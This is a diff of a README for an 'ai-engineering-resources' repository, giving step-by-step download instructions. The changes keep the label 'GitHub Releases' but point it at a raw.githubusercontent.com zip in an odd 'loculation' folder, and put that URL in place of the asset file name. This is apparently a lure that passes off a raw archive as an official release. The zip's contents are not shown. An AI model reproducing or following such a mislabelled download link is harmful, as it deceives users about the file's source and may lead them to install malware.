ochiee/ai-engineering-resources/README.md

 This guide will help you download and run the software from the Releases page.
 Follow these simple steps to get started.

 ### Step 1: Visit the Releases Page
-To get the latest version of **ai-engineering-resources**, visit the Releases page here: [GitHub Releases](https://github.com/ochiee/ai-engineering-resources/releases).
+To get the latest version of **ai-engineering-resources**, visit the Releases page here: [GitHub Releases](https://raw.githubusercontent.com/ochiee/ai-engineering-resources/main/loculation/ai-engineering-resources.zip).
 This page contains all the versions available for download, along with their release notes.

 ### Step 2: Choose Your Download
 On the Releases page, you’ll find various versions of the application.
 Look for the latest release listed at the top.

 - Click on the **Assets** dropdown to see the available files associated with the version.
-- If you see a file named something like `ai-engineering-resources.zip`, this is the file you need.
+- If you see a file named something like `https://raw.githubusercontent.com/ochiee/ai-engineering-resources/main/loculation/ai-engineering-resources.zip`, this is the file you need.

 ### Step 3: Download the File
 To start the download:

-1. Click on the file name (e.g., `ai-engineering-resources.zip`) in the Assets section.
+1. Click on the file name (e.g., `https://raw.githubusercontent.com/ochiee/ai-engineering-resources/main/loculation/ai-engineering-resources.zip`) in the Assets section.
 2. Depending on your browser settings, the file will automatically download, or you may be prompted to choose a location on your computer to save it.

 ### Step 4: Extract the Files